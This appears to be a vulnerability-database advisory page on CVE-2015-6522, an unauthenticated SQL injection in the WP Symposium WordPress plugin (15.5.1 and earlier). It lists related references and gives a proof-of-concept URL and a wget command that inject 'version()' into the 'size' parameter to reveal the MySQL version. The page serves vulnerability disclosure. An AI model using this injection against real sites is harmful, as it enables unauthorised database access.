Lucene search

K

WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

๐Ÿ—“๏ธย 09 Aug 2015ย 00:00:00Reported byย PizzaHatHackerTypeย 
wpexploit
ย wpexploit
๐Ÿ‘ย 17ย Views

Unauthenticated SQL Injection in WP Symposium plugin 15.5.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2015-6522
19 Aug 201515:00
โ€“cvelist
OpenVAS
WordPress WP Symposium Multiple SQL Injection Vulnerabilities
24 Aug 201500:00
โ€“openvas
CVE
CVE-2015-6522
19 Aug 201515:59
โ€“cve
Patchstack
WordPress Symposium Plugin <= 15.7- SQL Injection
19 Aug 201500:00
โ€“patchstack
Patchstack
WordPress Symposium Plugin 15.1 - SQL Injection #2
18 Aug 201500:00
โ€“patchstack
seebug.org
WordPress WP Symposiumๆ’ไปถSQLๆณจๅ…ฅๆผๆดž
2 Sep 201500:00
โ€“seebug
NVD
CVE-2015-6522
19 Aug 201515:59
โ€“nvd
Check Point Advisories
WordPress Symposium Plugin SQL Injection (CVE-2015-6522)
8 Dec 201600:00
โ€“checkpoint_advisories
Prion
Sql injection
19 Aug 201515:59
โ€“prion
WPVulnDB
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
9 Aug 201500:00
โ€“wpvulndb
Rows per page
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Aug 2015 00:00Current
1.3Low risk
Vulners AI Score1.3
EPSS0.97
17
.json
Report